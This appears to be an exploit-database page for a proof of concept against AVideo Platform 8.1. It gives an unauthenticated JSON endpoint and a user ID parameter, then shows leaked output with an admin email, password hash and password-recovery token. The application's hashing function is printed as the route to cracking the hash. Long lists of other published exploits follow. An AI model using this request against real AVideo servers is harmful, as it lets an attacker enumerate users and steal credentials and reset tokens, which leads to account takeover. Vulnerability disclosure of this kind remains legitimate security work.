Menu

Search for hundreds of thousands of exploits

"AVideo Platform 8.1 - Information Disclosure (User Enumeration)"

Author

Exploit author

"Ihsan Sencan"

Platform

Exploit platform

json

Release date

Exploit published date

2020-02-05

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Exploit Title: AVideo Platform 8.1 - Information Disclosure (User Enumeration)
# Dork: N/A
# Date: 2020-02-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://avideo.com
# Software Link: https://github.com/WWBN/AVideo
# Version: 8.1
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
# 
................
0	
id	92
user	"admin"
name	"Watch Later"
email	"[email protected]"
password	"bc79a173cc20f0897db1c5b004588db9"
created	"2019-05-16 21:42:42"
modified	"2019-05-16 21:42:42"
isAdmin	1
status	"watch_later"
photoURL	"videos/userPhoto/photo1.png"
lastLogin	"2020-02-03 08:11:08"
recoverPass	"0ce70c7b006c78552fee993adeaafadf"
................
# 
# Hash function to be converted ....
# 
function encryptPassword($password, $noSalt = false) {
    global $advancedCustom, $global, $advancedCustomUser;
    if (!empty($advancedCustomUser->encryptPasswordsWithSalt) && !empty($global['salt']) && empty($noSalt)) {
        $password .= $global['salt'];
    }

    return md5(hash("whirlpool", sha1($password)));
}
#
Release DateTitleTypePlatformAuthor
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-23"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-23"CyberArk PSMP 10.9.1 - Policy Restriction Bypass"remotemultiple"LAHBAL Said"
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-03-20"VMware Fusion 11.5.2 - Privilege Escalation"localmacos"Rich Mirch"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-03-18"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path"localwindows"El Masas"
2020-03-18"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure"remotemultiple"Maurizio S"
2020-03-18"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)"remotehardwareFarazPajohan
2020-03-18"Netlink GPON Router 1.0.11 - Remote Code Execution"webappshardwareshellord
2020-03-17"VMWare Fusion - Local Privilege Escalation"localmacosGrimm
2020-03-17"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-17"Microsoft VSCode Python Extension - Code Execution"localmultipleDoyensec
2020-03-16"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Directory Traversal"webappsphp"Antonio Cannito"
2020-03-16"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection"webappsphp"AYADI Mohamed"
2020-03-16"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)"webappsasp"Miguel Mendez Z"
2020-03-14"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)"doswindowseerykitty
2020-03-13"AnyBurn 4.8 - Buffer Overflow (SEH)"localwindows"Richard Davy"
2020-03-13"Drobo 5N2 4.1.1 - Remote Command Injection"remotehardware"Ian Sindermann"
2020-03-13"Centos WebPanel 7 - 'term' SQL Injection"webappslinux"Berke YILMAZ"
2020-03-12"rConfig 3.9 - 'searchColumn' SQL Injection"webappsphpvikingfr
2020-03-12"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"webappsphp"Milad karimi"
2020-03-12"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure"webappsjava"RedTeam Pentesting GmbH"
2020-03-12"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Akıcı"
Release DateTitleTypePlatformAuthor
2020-02-05"AVideo Platform 8.1 - Information Disclosure (User Enumeration)"webappsjson"Ihsan Sencan"
2020-02-05"AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)"webappsjson"Ihsan Sencan"
2020-02-05"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)"webappsjsonnxkennedy
2019-10-30"Ajenti 2.1.31 - Remote Code Exection (Metasploit)"webappsjson"Onur ER"
2019-09-25"NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution"webappsjson"Semen Alexandrovich Lyhin"
2018-11-05"Royal TS/X - Information Disclosure"webappsjson"Jakub Palaczynski"
2018-04-09"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution"webappsjson"RedTeam Pentesting"
2018-01-21"Shopware 5.2.5/5.3 - Cross-Site Scripting"webappsjsonVulnerability-Lab
2017-08-28"NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)"webappsjsonLiquidWorm
2017-08-28"NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting"webappsjsonLiquidWorm
2017-07-24"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution"webappsjson"RedTeam Pentesting"
2017-07-24"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure"webappsjson"RedTeam Pentesting"
2017-07-18"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)"webappsjsonxort
2017-06-02"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection"webappsjson"Goran Tuzovic"
2017-03-06"Deluge Web UI 1.3.13 - Cross-Site Request Forgery"webappsjson"Kyle Neideck"
2016-06-28"Untangle NGFW 12.1.0 Beta - 'execEvil()' Command Injection"webappsjson"Matt Bush"
2016-02-23"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery"webappsjson"Julien Ahrens"
Release DateTitleTypePlatformAuthor
2020-02-07"QuickDate 1.3.2 - SQL Injection"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - Remote Code Execution"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - 'user_email' SQL Injection"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - Cross Site Request Forgery (Add User)"webappsphp"Ihsan Sencan"
2020-02-05"AVideo Platform 8.1 - Information Disclosure (User Enumeration)"webappsjson"Ihsan Sencan"
2020-02-05"AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)"webappsjson"Ihsan Sencan"
2019-01-28"Mess Management System 1.0 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-28"Teameyo Project Management System 1.0 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-25"GreenCMS 2.x - Arbitrary File Download"webappsphp"Ihsan Sencan"
2019-01-25"GreenCMS 2.x - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-24"SimplePress CMS 1.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-24"Joomla! Component JHotelReservation 6.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-24"Joomla! Component J-CruisePortal 6.0.4 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component VMap 1.9.6 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vBizz 1.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vRestaurant 1.9.4 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vReview 1.9.11 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vBizz 1.0.7 - Remote Code Execution"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vWishlist 1.0.1 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-22"Joomla! Component Easy Shop 1.2.3 - Local File Inclusion"webappsphp"Ihsan Sencan"
2019-01-21"PHP Dashboards NEW 5.8 - Local File Inclusion"webappsphp"Ihsan Sencan"
2019-01-21"Coman 1.0 - 'id' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"MoneyFlux 1.0 - 'id' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"PHP Uber-style GeoTracking 1.1 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"PHP Dashboards NEW 5.8 - 'dashID' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"Reservic 1.0 - 'id' SQL Injection"webappsphp"Ihsan Sencan"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47997/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse